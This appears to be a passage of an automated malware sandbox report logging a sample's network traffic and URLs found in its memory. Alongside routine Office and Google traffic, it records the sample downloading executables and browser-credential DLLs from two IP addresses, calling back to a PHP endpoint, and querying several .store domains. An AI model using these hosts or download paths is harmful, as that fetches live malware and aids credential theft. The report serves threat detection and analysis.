Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xM6bluABF+SGvfF&MD=9wAFnYdP HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 09:18:03 GMTIf-None-Match: "6731cbcb-1c2800"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: navygenerayk.store

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 921sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: 167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/0
Source: 167c7bdf2f.exe, 00000021.00000002.3313929627.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Z
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe61395d7
Source: file.exe, 00000000.00000002.2412394871.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeR
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeed
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3125901674.0000000000F6A000.00000004.00000010.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3298481939.0000000000D3A000.00000004.00000010.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeX
Source: 167c7bdf2f.exe, 00000021.00000002.3299201571.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/steam/random.exet
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllHC
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllL
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllWB
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2412394871.0000000001426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllzCe
Source: file.exe, 00000000.00000002.2412394871.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/8
Source: 167c7bdf2f.exe, 0000001D.00000003.3088908428.0000000005A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/C:
Source: skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/K
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/Lu~
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/P
Source: skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/Yy
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php$n
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/1
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/D%
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/L
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/w
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00s4
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php7
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8n
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php;D
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpB
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpGD
Source: file.exe, 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK)
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: file.exe, 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS)
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpW
Source: d77e539f5f.exe, 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpX
Source: file.exe, 00000000.00000002.2411289868.00000000008B7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phphQ
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: file.exe, 00000000.00000002.2412394871.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo)%
Source: file.exe, 00000000.00000002.2435007953.00000000239C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpph
Source: d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpzpJS
